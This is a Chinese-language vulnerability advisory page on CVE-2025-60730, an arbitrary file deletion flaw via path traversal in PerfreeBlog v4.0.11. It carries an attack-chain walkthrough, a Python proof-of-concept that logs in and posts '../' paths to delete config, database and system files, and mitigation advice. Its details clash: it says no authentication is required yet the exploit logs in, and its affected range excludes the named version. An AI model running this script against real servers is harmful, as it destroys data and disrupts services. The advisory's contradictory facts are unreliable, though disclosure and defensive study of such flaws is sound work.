CVE-2025-60730 PerfreeBlog v4.0.11 任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-60730

漏洞类型

任意文件删除

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PerfreeBlog

漏洞概述

CVE-2025-60730是PerfreeBlog v4.0.11版本中的一个高危安全漏洞，源于unInstallTheme函数存在路径遍历和权限控制缺陷。攻击者可通过构造恶意请求，利用该漏洞删除服务器上的任意文件，包括系统配置文件、数据库文件、网站源码等。由于该漏洞无需认证即可利用（CVSS评分7.6），且对系统机密性影响较高，因此对使用PerfreeBlog的系统构成严重威胁。攻击者可通过删除关键文件导致网站功能瘫痪、数据丢失或进一步实施远程代码执行攻击。

技术细节

漏洞位于PerfreeBlog的unInstallTheme函数中，该函数在处理主题卸载操作时，未对用户输入的文件路径进行充分的验证和过滤。攻击者可以通过构造包含路径遍历字符（如../）的请求参数，指定要删除的目标文件路径。由于函数以系统权限运行，攻击者可以删除任意文件。攻击流程：1）攻击者登录系统并访问主题管理功能；2）构造包含恶意路径的主题卸载请求；3）服务器解析请求时未进行路径规范化检查；4）通过路径遍历指定系统关键文件路径；5）服务器执行文件删除操作，导致系统文件被破坏。该漏洞与CWE-22路径遍历和CWE-284权限控制不当相关。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的PerfreeBlog管理后台，使用有效凭证登录系统

STEP 2

步骤2

攻击者访问主题管理页面，查看已安装的主题列表

STEP 3

步骤3

攻击者构造恶意请求，在unInstallTheme功能中注入路径遍历载荷（如../../../）指向系统关键文件

STEP 4

步骤4

服务器解析请求时未对filePath参数进行路径规范化和安全验证

STEP 5

步骤5

服务器以高权限执行文件删除操作，导致系统配置文件、数据库文件或其他关键文件被删除

STEP 6

步骤6

攻击者可通过删除配置文件导致服务中断、删除数据库文件造成数据丢失、或删除安全配置后进一步实施RCE攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-60730 PoC - PerfreeBlog Arbitrary File Deletion
# Target: PerfreeBlog v4.0.11
# Vulnerability: unInstallTheme function allows arbitrary file deletion

TARGET_URL = "http://target.com"
LOGIN_URL = f"{TARGET_URL}/admin/login"
THEME_MANAGE_URL = f"{TARGET_URL}/admin/theme"
UNINSTALL_URL = f"{TARGET_URL}/admin/theme/unInstall"

session = requests.Session()

# Step 1: Login to admin panel
login_data = {
    "username": "admin",
    "password": "admin123"
}
response = session.post(LOGIN_URL, data=login_data)

# Step 2: Get theme list and identify target theme
response = session.get(THEME_MANAGE_URL)

# Step 3: Exploit - Delete arbitrary file via path traversal
# Delete config file or other critical files
malicious_paths = [
    "../../../config/application.yml",
    "../../../data/perfree.db",
    "../../../../etc/passwd"
]

for path in malicious_paths:
    exploit_data = {
        "themeName": "malicious_theme",
        "filePath": path
    }
    response = session.post(UNINSTALL_URL, data=exploit_data)
    print(f"[*] Attempting to delete: {path}")
    print(f"[*] Response: {response.status_code}")

# Note: This PoC requires authentication and user interaction (UI:R)
# CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

影响范围

PerfreeBlog < 4.0.11

防御指南

临时缓解措施

立即限制PerfreeBlog管理后台的访问权限，仅允许受信任的管理员IP访问；在Web应用防火墙中添加针对路径遍历字符（../、..\）的检测规则；临时禁用主题卸载功能以防止漏洞被利用；加强对管理员账户的安全防护，使用强密码并启用多因素认证；定期备份系统配置和数据库文件，确保在遭受攻击后能够快速恢复服务。